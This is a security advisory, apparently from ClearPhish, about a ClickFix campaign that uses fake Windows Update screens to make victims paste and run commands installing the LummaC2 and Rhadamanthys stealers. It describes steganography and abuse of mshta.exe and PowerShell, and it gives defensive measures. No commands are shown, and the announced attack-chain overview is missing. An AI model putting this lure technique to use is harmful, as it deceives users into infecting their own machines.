Cybercriminals have evolved the ClickFix social-engineering attack vector with a new variant that leverages highly convincing fake Windows Update screens in users’ browsers to coerce them into executing commands that ultimately install malware on their systems.

What’s Happening?

Researchers have identified a surge in ClickFix attack variants that trick victims into believing they are completing a critical Windows update. These malicious pages display a full-screen Windows Update animation and instruct users to perform keyboard shortcuts, which automatically paste attacker-controlled commands into the Windows Run box or Command Prompt. When the user executes these commands, malware is downloaded and run on the victim’s machine.

Unlike simplistic fake update traps seen previously, this iteration employs advanced steganography to conceal portions of its payload inside image files, making detection by traditional defenses more difficult.

How the Attack Works

Below is a simplified overview of the attack chain observed by threat researchers:

Note: Real Windows updates do not require users to manually paste and execute arbitrary code.

Why This Is Dangerous

This ClickFix variant is particularly concerning for the following reasons:

• Realistic Visual Deception: The fake update screen convincingly mimics the legitimate Windows update interface, lowering user suspicion.

• Steganography: Embedding malware code within images that are reconstructed programmatically makes detection harder for signature-based security tools.

• Living-off-the-land Tools: The attack abuses trusted Windows binaries like mshta.exe and PowerShell, enabling execution without leaving clear traces on disk.

• Persistent Threat: Even after parts of its infrastructure were taken down by law enforcement, the fake update domains remain active, posing ongoing risk.

What Malware Is Delivered?

In the analyzed campaigns, researchers recovered two primary malware families delivered through this technique:

• LummaC2 – A credential-stealing malware.

• Rhadamanthys – Another information stealer known for harvesting sensitive system and user data.

These payloads are reconstructed and executed in memory, helping them evade traditional disk-based detection.

How to Protect Yourself

To reduce the risk of falling victim to ClickFix attacks, security teams should consider the following measures:

1. Disable Windows Run Box (Win+R)
Where possible, prevent users from invoking the Run dialog, since this is often abused in these attacks.

2. Monitor Process Chains
Watch for unusual child processes such as explorer.exe spawning mshta.exe or unexpected PowerShell commands.

3. User Awareness Training
Educate users on why they should never paste commands into system dialogs or run code from unsolicited web pages.

4. Incident Investigation
In the event of a suspected breach, analysts can review the RunMRU registry key for evidence of malicious commands being executed.

Bottom Line

The ClickFix technique continues to evolve, blending social engineering, stealthy payload delivery, and abuse of trusted system functionality to trick users into infecting their own machines. This campaign underscores the critical importance of combining user education, endpoint monitoring, and behavioral threat detection to protect organizations from sophisticated human-centric attacks like this.

Disclaimer: ClearPhish maintains a strict policy of not participating in the theft, distribution, or handling of stolen data or files. The platform does not engage in exfiltration, downloading, hosting, or reposting any illegally obtained information. Any responsibility or legal inquiries regarding the data should be directed solely at the responsible cybercriminals or attackers, as ClearPhish is not involved in these activities. We encourage parties affected by any breach to seek resolution through legal channels directly with the attackers responsible for such incidents.